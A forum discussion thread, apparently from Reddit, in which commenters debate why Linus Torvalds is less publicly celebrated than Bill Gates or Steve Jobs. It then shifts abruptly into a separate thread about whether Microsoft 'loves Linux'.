he's more of a quiet kinda, "I made a thing" type guy.
And git! He changed the tech world twice.
I would say that he is well regarded in the computing world.

The reason Bill Gates and Steve Jobs are so well known outside the computing world is because they are Billionaires.
Because he's not a capitalist and we live in capitalism.
Do you know David Clutter or the people behind XNU?
Bill Gates became wealthy stealing ideas from other companies and rebranding them, ultimately making billions off of other people's ideas.

Steve Jobs became wealthy being an OCD control freak, making a HELL of a product, but on the work of others, again ultimately making billions off of other people's ideas.

In today's world, people deify wealth instead of what really matters, accomplishment and an attempt to better mankind.

Linus Torvalds did both. Sure, his work on the Linux kernel was initially derived from Minix and Unix ideas, but he made something unique. I didn't know he made git, but fucking A that's something else he's awesome for.

But the bottom line is he isn't a tech mogul with billions of dollars. He's just a brilliant programmer who didn't capitalize on his own ideas, instead giving them to the world to freely modify and change, contributing to the betterment of mankind (or at least programmerkind lol)

Motherfucker should win all the awards and have all the money, but our society doesn't acknowledge brilliance, but wealth.

My last thought is that although Linus isn't phenomenally wealthy, I sincerely hope he's happy and healthy and his life is awesome. Mine is, professionally, because of him.
Money.
Linus, not Linux. And he is bigger than both of them combined.
For better or worse, Bill Gates and Steve Jobs changed the course of global capitalism. You may think this is a good thing or a bad thing, but their accomplishments in computing pale in comparison to their impact on the global economy and culture. 

Torvalds gave us the tools and infrastructure necessary for the modern internet and, in my opinion, has continued the spirit of openness, idea sharing, and freedom unique to the very early days of computing when personal computing was still associated with the 60s/70s counterculture (ironically Gates/Jobs both emerged from this primordial soup as well). This spirit is still necessary for innovation and will continue to be necessary for innovation; it will never go away. As long as there are people like Jobs changing the world with the iphone, there will be people like Torvalds discovering code that can make people’s lives simpler and sharing it for free *for that reason*.

All three men are very important in their own way, imo
First proof/tell me how you know that Bill and Steve is more appreciated, then I will tell you why.
hard to have respect for two people who stole everything they could to make them billions, one created the worst OS imaginable and the other HW you cant repair. stunning achievements for humanity.

Linus didn't do it for money
People are idiots and know only what media tell. Media know only successfull business man by they money and not how money was made. 

Intentors and the work behind is never know.

Dennis Ritchie was dead in the same year of Steve Jobs, nobody know Dennis, the Father and Hero of computing.
You're mistaken. Torvalds is much more appreciated. Gates will probably be remembered as a philanthropist, but go back a few decades, and he's famous for being a monopolist that basically holds the world hostage and rakes in the dough. He was the Bezos of his time. A villain. The philanthropy is about breaking that image.

Jobs is only admired by iPeople. Outside of that bubble, it's quite well known he was just a marketing guy, and a horrible person to work with. Kinda like Torvalds actually.

But Torvalds will be remembered for his work. His code. He's highly respected.

The other two are only respected by tabloids and other trash like that. That's the kind of respect that isn't worth much.
And also like: "Who's Tim Berners Lee". 

I mean really, come on! 

If these guys are so smart how come they're not billionaires. 

USA! USA! 

(snort/giggle)
He doesn't advertise
It takes time to sift through the noise, even for intelligent people, before history can fairly attribute new technologies to the key individuals and events.  Even so, most people will never know the singular historical figures who made most of civilization possible.

Printing Press, Steam Engine, Electricity, Radio, Computer, Unix, Linux, interwebs....(left a lot out)
Tbh to add on to what a lot of people are already saying, I think part of it is that I don't think he really ever wanted/wants that same kind of attention
Because he has no marketing budget.Simple.
You mentioned servers, desktop and mobile but forgot the amount of supercomputers, embedded devices and so on that use Linux.

And that's not counting Git, which by some opinions, has had even bigger impact on software industry: it is not simply version control, but workflow that it has impacted and also on pretty much every platform. With others like Subversion you were stuck on centralized model, but with Git the decentralized model has brought on multiple repositories and pulls&merges.
Linus was never the CEO of a multi-national, billion dollar company.
Linux is just the kernel. It was Android Inc who built the rest of it for phones and tablets. It was the Debian project and Red Hat who put together a server OS. Jobs was a very charismatic speaker and brought form to the masses when it came to industrial design. Not to mention his partnership with Woz created Apple along with kicking off the personal computer revolution. Bill Gates is more remembered for bringing hegemony to personal computers by making MSDOS and Windows compatible with all kinds of hardware and offering a common platform that could be targeted. To the public he is seen as a figurehead of Microsoft and person who created the PC. 

Linus is pivotal to some circles, but to the wider masses they use iPhone and Macs and think Steve Jobs. They use Windows PCs or MS Office and think Bill Gates. Even Android has become a Google product. The people and companies who finished the stack are generally going to be more well regarded than the person who wrote the kernel or the person who created the framework for FOSS as a legal concept or who wrote a library that is used on every web server. Gates and Jobs were public facing and neither did a lot of engineering. It was their partners Woz and Allen who wrote the software.
If he really wanted adulation, he would have no problem getting it, he just doesn't care.
Most people, when they think of computers, think only of Windows.  It was, after all, most peoples' first (and, oftentimes, only) experience with a graphical desktop on a laptop or desktop.  Most people seem to know that Bill Gates has/had *something* to do with the creation of Windows, so they equate Bill Gates == Windows == "that guy who's responsible for the OS my computer uses".

At the same time, most people equate Apple == non-Android mobile phones (and Samsung == Android).  In *North America*, iPhones are the clear "winner" in most peoples' eyes, and since a *lot* of people know Steve Jobs was part of Apple, they equate Steve Jobs == "that guy who made the only mobile phone I care about" == "that guy who changed *mobile* computing".

*Nobody* I know outside of my technical circles has the slightest clue who Linus Torvalds is.

Based upon the above, is it any wonder Bill Gates and Steve Jobs get the most recognition?
Simple answer: He's not rich, and he isn't constantly taking credit for the success of Linux.

He's just as involved if not more in the design principals around Linux development as the other two.

Linux is the default OS in a large amount of systems. Most embedded systems, and it's in the top 5 most used, arguably top 1 or 2. However it only is that popular because it is free.

Large companies like Twitter run their software on Linux. Probably a majority of what you interact with that isn't your home PC (websites and webservices, smart tvs, the digital dashboard in your car, digital billboards, etc) run on Linux fully or in some capacity.

He's arguably more influential than Steve Jobs. Touchscreen phones were not even an original idea, Apple was just the first to successfully implement it in a useable way (huge feat.) 

Linux sucks at two things IMO. Being user friendly. Making money.

A majority of people have never really interacted with Linux as a brand. It's always filtered through some company's branding and UI. And Linus himself is not constantly in magazines that write populist articles about fabulously rich people, because he is not.

Do developers know about him? Yes of course. Have you tried managing permissions on a Windows machine? It's a nightmare.
Um, dumping money into public relations? They are all known to be dickheads, not uncommon for successful people.
LOL @ \~LINUX\~Torvalds
Linus torvalds is not a life style brand, he didn’t set out to make an appliance, a toaster, he set out to make a usable computer for himself like what he enjoyed at university.

He also wasn’t trying to make a system for businesses to use. Despite all the other OS’s out there today.. if any of them will survive for 2,000 years or more it’ll be some form of Linux imo, not Windows or macOS.
Probably, but I don't think he'd want that kind of recognition. 

I think Linus is very happy going to the store and buying milk and not being mobbed by people. Yes, he's a celebrity to us, but to the rest of the world, I doubt they could pick him out of a line up.

As for changing the face of computing, we know that he did, that's what matters.

The fact my mom has no idea who he is, I don't think that's such a big deal.
I think some of this lack of public recognition might be encouraged by Torvalds himself. If you watch his interviews, he seems to be a fairly private person.

Now, contrast that with Bill Gates who actively made sure he was associated with his own work (kinda hard not to be when your company name is everywhere and you're the shot-caller for all intents and purposes), or with Steve Jobs who basically led his marketing campaigns himself, in-person which puts his face everywhere the apple logo went...

Torvalds just seems to me, to be the kind of guy who lets his work do the talking rather than buy into his own marketing hype, which for him isn't much.
Because he's not a capitalist  manager, the 21st century prophet
As appreciated, by who?

Anyway: first off, most people don't care that he achieved X without "creating a gigantic chain of proprietary ... ...". Sad but true. Secondly, what he achieved is hidden. Think of it like this alternative question: why do so few Netflix subscribers - or anyone using networking of most kinds - appreciate all the good that the FreeBSD project gives them in their daily life?

Because they have no notion of the many things that happen behind the scenes, just like very few people will give those of us that have worked to automate things in industry any thought when they buy a cheap set of IKEA furniture etc. You and I are no better: we're more aware in one space (computing/networking), but probably just as ignorant in a whole lot of other spaces.

But Gates and Jobs were visible to normal consumers. So, they get appreciation (and hate!) from said normal consumers.
Bill Gates and Steve Jobs worked with the capitalist economy to generate massive profits.

Linus Torvalds worked with the commons to make his PC work, just for fun.
just wanted to add that an overwhelming majority of systems on the top500.org list of fastest supercomputers in the world run Linux. If you look at the list you'll see things like HPE Cray OS or  bullx SCS, those are just packaged versions of SLES.
Bill Gates and Steve Jobs are both salespeople but Torvalds is an engineer.

Since I answered the question I shall now rant: Im telling you right now, one good technical writer could convert tens of thousands of people to Linux. Ive daily driven 10+ distros at this point and getting solutions for *anything* is a goddamned nightmare, but but but *executing* the solutions is usually literally copy/paste something into terminal, or edit a text file. If it wasn't for decades of desktop support I wouldnt even put up with this shit, but if someone consolidated this info for the 3 major bases (RHEL, Debian, Arch) *but in a way normal humans can easily read* (ie *not* ArchWiki), then it would make it a trillion times easier for people to convert.

One website that does nothing but focus on installing and configuring a *useful* system for the 3 major cores, and presents that info like a tutorial or book and not just a collection of hyperlinked related articles, *that* will be what really moves the needle for the masses.
Linux is used in peoples everyday lives and not noticed. 

It’s the core of android phones. It powers the routers that make the internet work. It powers their home routers and smart devices in their homes.
Not as good a PR team
Because he’s a prick!
Because he didn't make excessive wealth from it.
Simply put: our aggressive diefication of Capitalism
he's not a ruthless capitalist
\- Lesser PR team

\- Generally more willing to talk hard truths. It is surprising how many people don't like that.

\- Doesn't desire hero worship, thus doesn't go seeking it out.
He's so underappreciated that people can't even spell his name right.
He's appreciated like Euler is by mathematicians, physicists and engineers. Yeah, Newton is a household name, but Euler is the real MVP, and if you know, you know.
It's the same as asking why the Kardashians are famous and not Watson and Crick.
Do people know
 winNT or windows
XNU/BSD or MacOS
ACKs/Linux or Android
Linux or RedHat (eh maybe this one is equal but I grew up around Redhat so it was decently known there)

Users aren't meant to know about a kernel not to mention Linux was his creation but it was ported and borrowed from many places hence GNU/Linux is a more apt term.  It was all based off Minix which was based off UNIX the entire socket system came from X lots. Ect ect ect
What is "funny" is that i am sure that most of the world outside of USA had not heard of Woz and Jobs until the ipod hit market.

PC running Microsoft software, some with code written by Gates himself, was the go to computer platform globally.

Hell, had Apple refused to release iTunes for Windows they would likely have gone bankrupt back then.

Torvalds is Gates minus the ruthless business methods.
Because humans worship the golden calf. almighty buck. whatever you call it.


People buy Windows, Office, Macs and iPhones.  People don't buy the Linux kernel.  They may have the Linux kernel on some of their devices, but they don't need to know this - they have no dealings with any "Linux company" directly.

Just because a company is well known or very large doesn't make their product better.  Every electronic device you own has components made by a number of companies that are all very important but you don't necessarily need to know about who those companies are.
world only cares about egomaniacs. Torvalds is a bit of an egomaniac but not on the level of those guys lol not close
Because Linux isn't widely adopted by the mainstream
Because the other two have a direct recognisable (by the end user) impact on their daily life, Linux does too but they have no clue about servers or what’s behind the cloud.
Linux Torvalds? What about Tim Apple? lol.
This world is full of engineers who *you dont know by name* but have more impact than any dork you’ve ever seen on TV, because said engineers **typically dont fellate themselves publically like that**.

Not saying always, but there is a class of engineer in all fields who are genuinely excited to chase the problems, without having to jerk themselves off to the world about it.
Because Linus isn't a billionare.
Linus chose altruism, .Steve and bill patented and marketed the shit out of computing. 

You wouldn't have billions of Linux devices without the pr, marketing and business sense the other two put forward.

Look at Linux gaming, we've been talking about that for DECADES only for Valve to get pissed at Microsoft and make Linux a viable competitor within a handful of years (in comparison) . Without that push from valve would Linux gaming be as popular? 

Would we still be reading newspapers? Buying magazines and showing slides of your vacation at family gatherings? Would the internet be covered in BBS boards? 

 We'll never really know, but looking at how Linux, on a consumer level, is still pretty fringe.
He gave it to the world. He let people do with it what they wanted. Gates and Jobs sold whatvthey had and enslaved their customers into their environments. That creates a Stockholm syndrome following where people laud their oppressors. 

Torvalds has never been in that position where people have had to do it "my way or the highway". Actually he created the "highway" for those who don't want to be subservient.
Because this country cares about people who become gazillionaires more than they care about people that actually create. If they did, Dennis Ritchie and Torvalds would be talked about a lot more outside of geek circles. The Kardashians are famous for being rich, nobody cares about art until it sells for millions, and no one cares about computer stuff unless someone becomes a billionaire from it.
i think it's all about the money, if he made the same amount of money of any of the others he would be famous as the man who made a lot of money because of linux
The appreciation of the Users is not worth much compared to the appreciation of Administrators.
The cult of personality is not a meritocracy.
Who doesn't appreciate Mr. Linus Torvalds doesn't know computing well, so you can safely ignore them.
Because WE are Linux! Even in the beginning there was a community yes Linus contribution was huge but Richard Stallman and many others was as great and some would argue even greater.
I think it's the reverse, workers like Steve Wozniak, Linus Torvalds, Dennis Richie / Brian K, Bjarne S and all of them who actually made a difference were not just in it to make money and hence they didn't get in to loud publicity and marketing stunts.

I would say while Bill gates and Steve Jobs are respected, the likes or open source gurus are equally so. They willingly shy from the camera and be recluses just doing what they are so good at, improving the world of computing one thing at a time

The best acknowledgment comes from your enemies. Look at pre satya nadella microsoft.  They ran malicious campaigns against Linux and also open source world of software. They conspired with industry hardware vendors , bullying them in to not supporting Linux. And today ? We have a Linux subsystem in windows, azure running open source containers and Ubuntu instances, their futuristic iot stack running on Linux. What more can one want as validation for Linux.
In my experience Linus is more appreciated than those others. Depends on your perspective I suspect.
Because Linus don't give a shit about corporate world and making billion dollar profit. He just want to improve the Linux kernel and continue to enjoy the process for the rest of his life.
Because he did not make billions with it. That is the sole reason. Hell, Musk has a cult following and when has he ever done anything of actual value? At this rate he is probably going to be president in a few years.
That is strictly because they managed to get their operating systems and hardware marketed to mainstream audiences for decades.
nobody knows the dude who made the first LCD

you're asking society to be more knowledgeable than it wants to
Bill Gates and Steve Jobs were CEOs and marketers.  Linus, like Dennis Ritchie, was more of a creator.  Engineers too often are no given proper credit for their work.
Marketing.

A lot of attention one gets is wrapped entirely around whether or not they can/will make themselves a public figure.

Also Torvalds is presumably a millionaire, but he's not Gates or Jobs rich because they're both worth billions.

Linux also doesn't have a publically traded corperation behind it, it's a nonprofit that exists in the background. Linux is the thing that makes other things work, it's not quite as alluring as a brand like Xbox or Iphone.
Because capitalism celebrates rich people, not people who give things away free.
Because Gates made computing accessible to everyone with the desktop. Software developers loved this because more people could use their product on Windows vs Linux. Windows won the war, and usage is more than all other OS combined (thousands of times over).
In 100 years when Steve Jobs is a sad example of a distant memory, we will still be running Linux. Kids in schools will be taught about Linus Torvalds during IT because he is still relevant. To be fair, you might have noticed that people actually don't talk about Steve too much anymore. Just be glad that Elon Musk hasn't made an OS.

Bill Gates will be discussed only as long as Windows is around. With Microsoft's lack of direction and weird push to the gimmicky cloud, that might not be much longer.
Cause torvalds made two things kernel and git. While they are technically fantastic achievements and absolutely useful. 

They didn't change the world like the first apple pc or iPhone did. 

Bill gates i think he became famous more cause he was the face of Microsoft then the various activism things.
Well Jobs and Gates headed to billion dollar companies and were responsible for some world changing innovations.

Linus just has a popular YouTube Channel that reviews hardware.
Because he isn't a rich loudmouth. America worships wealth and fame. He's cantankerous for sure, but is not rich nor apparently interested in fame.
You could ask the same questions about somebody like Tim Berners-Lee. Him, Linus, and Dennis Ritchie have done more for computing than ole Steve and Bill ever did. Steve and Bill just monetized way better, and we often celebrate money (and the influence it has) more than we celebrate people and non-monetary achievements.
What did Steve jobs ever do? Be a tech nomad and steal code from various BSDs and make Woz do all the hard work?
Because in a capitalist society people worship those with money not those with intellect and the drive to use it to create things that are useful to everyone.

This is why Bill Gates, Steve Jobs, Larry Page, and lately Jensen Huang, etc. get more appreciation than they deserve and Linus, Dennis Ritchie, John von Neumann, and others don't get much recognition much less appreciation.
Sociopaths get more glory than geeks
*Why do you think Linux Torvalds is not as appreciated as Bill Gates or Steve Jobs when it comes to people who changed computing?*

The same reason that people listen to celebrities instead of to scientists when it comes to climate change (or anything else). People in general are uninformed.

I am sure that most of the real IT people know about the genius of Linus Torvalds and Dennis Ritchie (and look to Gates and Jobs as managers or something).
Because society doesn't care about anything anyone does unless it's profitable.
FFS Steve WOZNIAK changed computing.  Jobs was just a salesman who then morphed into a shitty asshole who liked clean designs.

Edit:  Downvote all you like but that doesn't change the fact that Steve Jobs didn't change computing.  Not at all.
Because the lack of good UI/UX prevented Linux from being a mainstream OS in the 1st place, and he did not make the next gen phone popular.
You don't even know the name of the person you're talking about, so you could be asking these questions yourself.
He is.
Because no one even know he exists/what he did
Money my friend  
Also, as a consequence, bill gate gets to appear everywhere, be it good or bad. Other than techie circles, no one knows or cares who linux is  
Some misconceptions are still floating around, such as it was he who invented computers
He hasn't died yet, physically or from inside.
Money
Same as Dennis MacAlistair Ritchie. Most people are blithering idiots.
the history of Bill Gates and Steve Jobs easily shows these two alone was marketing something the world can use. Steve took it a step further and marketed security. With a marketing ploy and investors backing up your company and products, you can bet there will be media campaigns on those OS's. Both Bill and Steve are greedy businessman. 

This is another reason why I love Linux. It was built for usability, security and safety. There is no marketing or investors behind it, and there does not need to be anything because Linux speaks for itself. If your going to use an operating system on a daily, Linux provide all the tools YOU need, not what you MIGHT want. Bloatware is very common in IOS/Macs and Windblows.
Because, he hasn't made enough people rich.

Microsoft and Apple made a lot of people a lot of money.  That is all.  If you make people rich they will build a shrine of you.

Even though Linus Torvalds probably has made people a lot of money.  Including people at Google.  A lot of the attention goes to Google and Google executives.  Not the kernel that they use.

Linus Torvalds is basically put in a position of an underrated developer.
Capitalists despite open source except when they are exploiting and benefiting from it.

The greatest most incredible folks who have improved humanity have done it to help humanity, absolutely never for a profit motive.

The indoctrination to worship greed and the most exploitive is absolutely out of control in the US and many colonized nations forced to worship this religion of greed and unsustainable exploitation.
I love Linux, don’t get me wrong but if he would have not created it, wouldn’t we use other Open Source *nix versions?

My point is Linux success is a little bit of Linus ingenuity + timing + users adoption.
Because Richard Stallman > All of them.  This is why:

Linus was nice to assist him but the other two ain't better than shit.  Do you fucking trust them?  Cuz if you do, you're fucking stupid as shit.  I don't need to trust Richard Stallman  because he writes it FOSS.  From that, I only need to trust myself and the words of those who read it if I don't myself.

Anyone who trusts someone we *know* fucked it up countless times, and on my bet: is spying on you (shit isn't even denied these days, they claim it's to *"help you"*), is a dumbass.  And if you pretend the other guy don't, you're a fucking sucker.
$$$?
Torvalds objectively has fewer accomplishments.

Besides growing Microsoft into a behemoth and nearly standardizing desktop computing, Gates has saved millions of lives in Africa and continues to have global impact on big problems.

Jobs helped drive the Apple \]\[ but then also the Mac and the iPod and the iPhone. He provided only a few true innovations, but Apple built and marketed these products well and has repeatedly helped push the whole industry along. (Arguably. I'm not actually an Apple fan.)
He literally wrote git and nobody cares. I’ve used his programs and systems every single day of my programming career. I can’t say that about any of the tech billionaires. I brush elbows with their products. I RELY on Linus’ creations.
With the people I work with he is. He's just a less commercial figure.
Because no one got rich off it.
He's not as popular. Didn't create this image of himself like the other 2 have.
Linus has never tried to promote himself or make a ton of money. He's a genius hacker and manager and that's it. The others all wanted fame and billions. They all got what they wanted. I think Linus is the happiest of all of them.
Same reason Steve Wozniak isn't appreciated as much or more than Steve Jobs   


He isn't the billionaire that paid to get interviewed a ton or to be put at the front of magazines.
Linus is plenty well known and appreciated within the computing industry. As far as the consumer facing world Linux just isn’t that visible.
most people have no idea that Android uses a Linux kernel nor do they realize Chromebooks also use a Linux kernel (and uses Gentoo as a foundation).

Gates and Jobs changed and defined personal computing. 
Linux changed and defined mobile and data center computing.
I think he is viewed more so in the enthusiastic public. Average consumers don't understand how critical Linux is to backend and now frontend computing with Android and Chrome Os.
Only two of them have had a massive marketing budget and things to sell.

There are umpteen people who have changed computing but who haven't had the marketing budget use them as a figurehead for sales.
I think he's more appreciated by Linux users than the others are by PC/Mac users. Linus continues to do amazing things in an ethically meaningful way. The others are capitalists with inheritances that have achieved little of technical merit while exploiting their neighbors to enrich themselves. They can rot.
He cares more about development than marketing just like in the case of Nikola Tesla and Edison.
Linus Torvalds is in a different category. While Linux is awesome, it doesn't have the mainstream use of Apple or Windows. Apple is worth hundreds of billions of dollars. Linux isn't. Now, I've been a diehard Linux user for over 7 years now, and have never owned an Apple product. I appreciate Linux and Linus. But, you have to remember, most people haven't heard of him. At this point, most people don't even know what Linux is.

Also, Linux is amazing, but it wasn't first. Macintosh's and Windows computers, were people's first personal computer. They were the first computers people saw with mice and gui's. They were revolutionary. People simply care less about successors than they do about those groundbreaking products.
You could ask the same about Dennis Ritchie, who died around the same time Jobs did. Or Ken Thompson, who is fortunately still around and well.

The answer is Marketing.

Bill Gates has been constantly talked about in boomer documentaries as that amazing whiz kid who put America on the map in worldwide computing.

And Jobs, despite being a complete asshole, has been the face of a company that for some reason is incredibly popular, though the massive social media campaign after he died kinda surprised me and I have no idea what it was about.

One factor is that far more people will know what an iPhone or Windows is than what C is or understand what makes Linux and FOSS computing so amazing.

Another one is that people, especially in the highly competitive US society will always be fascinated by wealth. Which Bill Gates in particular often puts into his PR.

And occasionally some smear campaigns.

Still, he's more charismatic than Sweaty Balls Ballmer.
Because people appreciate what they can actually see, even though linux powers like 90% of servers out there, the only people who would appreciate it are professionals and the tech savvy in general. Macs, Iphones and Windows on the other hand are used in both professional and entertainment settings by a shit tonne of people out there, for the majority of people the perceived value of those products and the people that represent them is much higher than whatever OS is powering the online services they use daily.
Our society respects power and money (which is just power in currency form).
Let me put it this way. How much do you appreciate Dennis Ritchie? He changed the world way more than Linus did, but you wrote about Linus instead.
He is, by people, like us, who use and love Linux.
Because he didn’t make billions of it it and become rich and powerful. America has a hypocrite thing you see, they say they’re not all about money, but thats all they care about.
>... without creating a gigantic chain of proprietary software/hardware to flood the market.

This here is kinda your answer. Whether we like it or not we do live in a consumer based environment and things that sell drive the market.

>Now, on the mobile market, Linux-based systems are installed on around half the phones in the world.  
>  
>Most servers running the Internet are using a system based on the Linux kernel.

Very true but at the same time how many people outside of tech do you think will know about those statistics? A lot of "non-technical" people still after all these decades still struggle to understand what exactly a server is.. can't imagine they are aware of the platforms that these servers or their smartphones are running. It's just not in their sphere of interests.

So to answer the question, I guess it's because the majority of the people are not exposed to Linux, maybe haven't heard of it or very poorly understand it. Again talking about all of the people in general. Linus Torvalds has also never been covered by mass media on the same scale as Jobs or Gates per say. You also don't have Linux on the stock exchange.

I'm sure you can find the same trend in other industries tho.. Unless you're personally interested/have studied them or work in the field you wouldn't know who built what great engine model, you would probably associate the engine with the car manufacturer.. A great scientist may invent a new medicine that will then be used by pharmaceutical companies and again majority will only be associating that medicine with the company/ies that marketed it.
Because he's not a billionaire, and capitalism deifies billionaires.
Branding.
Just the same reason why everyone knew S. Jobs departure and no-one cared about D. Ritchie...
Slightly related. The maintainer of git on LinkedIn has less endorsements than many random nobodies (me included)
Same reason no one cares about Linux itsekf: people never heard about them
Because there's no advertise for Linux
Bill Gates was known as the richest man in the World. Steve Jobs as the guy who made iPhone. Both make for a good mass media story. Linus Torwalds is the guy who made Linux. The masses are not interested in that technical stuff more than what kind of engine their car runs. If you ask me I will tell you "a diesel engine" and that's it. Linus may not be well known to the masses but he is a rock star in the computing world.
Something tells me that Linus isn’t one for being in the limelight. He doesn’t have to prove to anyone what he’s accomplished. It speaks for itself. But yes, we wouldn’t be where we are without him.
Because Torvalds doesn't spend any money on PR
He also invented git. Absolute hoss.
I started taking Introduction to Linux a little over two weeks ago. For one of my assignments, I watched a video about the creation of Linux and GNU. In the video, Linus is very soft spoken and I think that’s one of the reasons why.
He's not a businessman.
Linus doesn’t try to be a public figure

Jobs and Gates did
most server loads are on linux, which is the vast portion of compute capacity, we neets are just not in the loop on that
Well... Because he's not stallman.  He made the microkernel, but minux was a thing already.

The iterated not innovated.

His real contribution has been a zealous advocate of Linux for decades
I guess the question is, "by whom?".

Personally, I think in regards to overall impact on computing, Torvalds is the clear leader. Not just that he created Linux, but because he *still manages* it.

In regards to changing the world, I think Bill Gates is the clear leader, simply because of the sheer amount of money he has made through Microsoft, *AND* because of how he has chosen to invest it. The Bill & Melinda Gates Foundation contributes so much to the betterment of the world. I also respect that Bill Gates actually did write a lot of the initial code for DOS and Basic.  While it may not have been specifically ground breaking, he clearly has a high level of personal expertise, and I respect that. IMO, one of the biggest mistakes that Microsoft ever made was canning the Longhorn project, the last one that Gates himself was overseeing, for taking too long. They instead cobbled together Vista which was a disaster. If you find the last beta builds of Longhorn, it would have been a game-changer for Microsoft. 

Steve Jobs was a marketing man. He knew what people wanted, and he knew how to order people around to get it. That's about the extent of it. I don't necessarily view him as particularly important.

Steve Wozniak, however, is an *awesome* engineer who deserves SO much more credit than he gets for Apple's success.
People equate wealth with achievement. Certainly that's true in the case of Gates and Jobs. Torvalds is not a billionaire.
It's because he didn't become a multi-billionaire at the same time he changed the world
The fact that you think his name is Linux is case in point for your own point.

The answer, though, is marketing. It's always marketing.
Why? Because tech companies have sales, marketing, and PR teams that are constantly reminding the public that their products and leaders exist. The Linux Foundation doesn't do sales or marketing, so you'd only know about it if you spent the time to learn on your own.
Cuz people are stupid. 

Amen, keeps folks like us employed.
Because in a capitalist world noone cares if you aint rich.
I think most people don't realize they use Linux when they use Google or other sites.

I know jack about electricity and outlets. I just plug stuff in. I'm sure a lot of big brains (whose names I don't know) made that process easy for small brains like me.
I can probably answer this question. Because the majority of people that use computers, of any type or flavour, have no idea who Torvalds is. They're primarily just users, and not evern close to power users. They go on the internet, check e-mal, and stream music/videos. 

They  either buy or use MAC's and PC's that have Apple or Windows products preinstalled, they get hit with the advertising everywhere, they deal with these machines and software at work, and at home. 

If you weren't into computers specifically, for years, you would have no idea what Linux was.
Linux + Git + GPL.  Linus is one of the most influential and successful programmers to date.  His impact will be felt for a very long time.  But making money is the big thing that makes people famous and "sexy."  Sadkly, the falue of an individual's life is still largely dependent on how much money they have.
He is far more appreciated than Bill Gates in terms of technical accomplishment and as an individual by those 'in the know' that aren't just playing fanboy to one side or another (or many).  He gives much more of his personal time and effort to the linux development community, and has done so for decades.

Not that Gates doesn't have plenty of accomplishment and 'positive' reasoning behind his own work and life, but his prime time was spent building Microsoft into a monopolistic juggernaut and approving FUD campaigns while pursuing an embrace, extend, extinguish strategy against (arguable superior) direct and parallel niche competitors in all sorts of software development.
His work on Linux has made him low key rich at around 150 million.    I'd be OK with that level of appreciation.
Probably because the majority of people haven't heard of linux
Because he didn’t monetize.
He’s not a billionaire. Idiots worship billionaires.
People in computing know, and appreciate him appropriately.

For people who don't appreciate him, it's probably for the same reason that Steve Wozniak is not as appreciated as Steve Jobs, even at the same company. Call it visibility, "personal branding", or egotism, but Gates and Jobs both had a very big drive for "I have to be important, and everybody has to understand that" while Torvalds and Wozniak were more interested in doing cool stuff and just happy that they could help improve things for others, along the way
Well his "product" isn't consumer oriented in the same way.

You don't see for example Larry Ellison (another stuidply rich character) being mentioned much either, other than mostly in a not so favorable light. He or Oracle has also done much for the enterprise sector.

There isn't as much hype for CEOs / Founders of B2B companies, I guess it's more focus on the products as tools to get things done. And what a tool Linux is!
Not because he isn't rich, this page ([https://www.wealthygenius.com/linus-torvalds-net-worth/](https://www.wealthygenius.com/linus-torvalds-net-worth/)) says his net worth is around US$200 million) but because he's smarter than either of them. The level of notoriety that both Jobs and Gates had/have ruined their lives. They couldn't sit out on a cafe patio without being recognized and mobbed.  They are the targets of envy and recrimination in the press. Would you recognize Linus Torvalds if he was walking in the park with his kids? Probably not but you sure as hell would recognize Gates (or Jobs if he was still alive). He may not be a millionaire but he's still alive, has made a bigger contribution to computing than either Gates or Jobs, he's got plenty of money and public anonymity as well.
Money.

Bill Gates and Steve Jobs both created huge mega corporations that employ hundreds of thousands of people, have created man, many millionaires and are (were in the case of Jobs) Billionaire's themselves.  


Linus literally changed the world for the sake of code but is generally just a nerd, coding.

Keep in mind that 85% of the world runs a Linux distribution called Android. 80% of those people don't know it is Linux and have never heard of Linus.

**TL/DR: Microsoft LOVES Linux as an internal tool that runs much of their internal operations.  They hate it as a competitor**

* Microsoft Loves Linux because **[Linux powers Azure networking](http://www.wired.com/2015/09/microsoft-using-linux-run-cloud/)**, which is their most promising business unit.

* Microsoft [used Linux to power their home page](http://www.crn.com/news/applications-os/18839747/microsoft-uses-linux-to-publish-its-own-web-site.htm) to protect against DOS attacks, and [to serve high-traffic downloads](http://arstechnica.com/civis/viewtopic.php?f=14&t=133559).

* Microsoft  [paid over $25 billion to buy a $3 billion revenue division running almost entirely on Linux](https://en.wikipedia.org/wiki/LinkedIn). 

The main reason they pretend they hate it is because they don't want their customers to move.
Or they'd allow DirectX to work on other OSes
Microsoft doesn't love Linux and never will. Anyone claiming that they do is either getting paid by them or really naive.
Well, they released .NET Core with Linux support. That counts for something, right? It's probably more reasonable to expect .NET to run well on Linux, rather than trying to get legacy Win32 APIs working perfectly. 
They have that Ubuntu layer thing on Windows. That's all yer gettin.
[deleted]
People really take this quote out of context.

It was obviously said by Satya within the context of the server market.
Microsoft spokesperson here.

Linux dominates the following markets:

* server
* super computer
* embedded
* infotainment
* mobile
* IoT
* mainframe
* cloud
* datacenters
* PoS

Windows dominates:

*  Desktop
* ???

And you guys want to take away the only thing we have? You jerks.  **/s**
Illogical. 

This would be working against their own interest.

Their 'love' prevails only in places where it does not conflict with their main business.
[deleted]
Naw, they'd port and then open source DirectX.
Corporations don't have feelings, neither love nor hate. just one imperative: increasing profit by any means.

Now the decisions made from people, the executives, can be very transparent or the opposite. They don't guarantee profit always, thought their only purpose is that.
They can't. Wine will not accept contributions from [anyone who "has seen Microsoft Windows source code"](https://wiki.winehq.org/Developer_FAQ#Who_can.27t_contribute_to_Wine.3F), so being MS developer would be pretty big red flag for them.
If Microsoft loved Windows/Skype/Hotmail/IE they would contribute to them too. So...... 

MS cares about money. There's no love nor hate here. MS does what it thinks will get it money, plain and simple.
if Microsoft really loved Linux they wouldn't have sued Android Phone makers
[removed]
Only if they thought that was the best way to promote what they love about Linux.

I'm really not convinced that's the best way. There are things the NT kernel just does better -- for example, it has an actual ABI and certification process for drivers, which means the clusterfuck that is Android updates (and the fact that they're held hostage by manufacturers) can't happen on Windows.

So you could argue that Microsoft really loves Linux because they just released Linux compatibility for Windows, so it's finally possible to build distros that are Linux all the way through userland, but have the full benefit of all those Windows hardware drivers *and* fully native Windows binary support that WINE Will never be able to match.

Or you could argue they didn't do enough, that if Microsoft really loves Linux, they should release the NT kernel source, so that those hypothetical Linux-distros-on-Windows can be at least as open source as the typical desktop Linux.

I guess this just seems like an arbitrary bar to me. No, I'm not saying Microsoft "loves Linux" -- I don't think corporations are capable of that. I'm certainly not saying you should trust Microsoft. But even if they somehow did love Linux from the bottom of their hearts, would contributing to WINE really be the best plan?
They don't love-love it, more like, "I love you, man".
I mean they are porting their enterprise-grade cash show, SQL Server, to run on Redhat.
Microsoft is going to buy Canonical. 
